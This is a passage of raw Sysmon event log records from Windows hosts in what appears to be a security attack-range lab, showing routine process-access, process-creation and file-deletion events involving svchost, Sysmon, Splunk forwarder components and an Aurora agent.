10341000x800000000000000016896Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.476{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016895Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.476{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016894Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.476{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016893Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.476{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016892Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.476{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016891Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.476{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016890Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.476{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016889Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.476{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E4C2-63C7-0C02-00000000B002}2160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016888Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.476{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E4C2-63C7-0C02-00000000B002}2160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016887Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.477{E5A8D418-E4C2-63C7-0C02-00000000B002}2160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016886Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.241{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB0AA9B496EBB01478381F7772913DBC,SHA256=C68488508917491BA71A4CAD5601B161A34970A03F6E9C894209DBA692C1B026,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016885Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:30.023{E5A8D418-E4C1-63C7-0B02-00000000B002}35003716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016884Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.997{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E23815AA7A2DDFCEAFE832DD8964FCE2,SHA256=5BA29A9F2FE9595517B5DBF4A9922317B77CF4C03880FCEEC9CBE4B26631FFFC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044116Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:30.630{FE4C2B44-E4C2-63C7-5306-00000000AF02}22324440C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044115Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:30.483{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E4C2-63C7-5306-00000000AF02}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044114Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:30.479{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044113Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:30.479{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044112Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:30.479{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044111Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:30.479{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044110Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:30.479{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E4C2-63C7-5306-00000000AF02}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044109Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:30.479{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E4C2-63C7-5306-00000000AF02}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044108Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:30.480{FE4C2B44-E4C2-63C7-5306-00000000AF02}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044107Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:30.030{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A96B0932725BE8545CCC915B427AC876,SHA256=054951E9C4256B1ACC8FD295A2A3D1AC994DF2FCA2A3A494E29AECE4906B296C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.971{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FB3AD1C97F2C116184D75FD58A77735,SHA256=B916198FF8077F08857AE449B7B006465B4942D47AC1F343928A44E181559B2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.971{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=F9BABDEF7994A2A4C12682B405326B21,SHA256=EC752741363B19685EAE1EC0CED0A18659DBFA41A9D8C941ACDA0641C9865382,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.859{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.857{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044151Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044150Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.850{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044149Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:31.847{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program 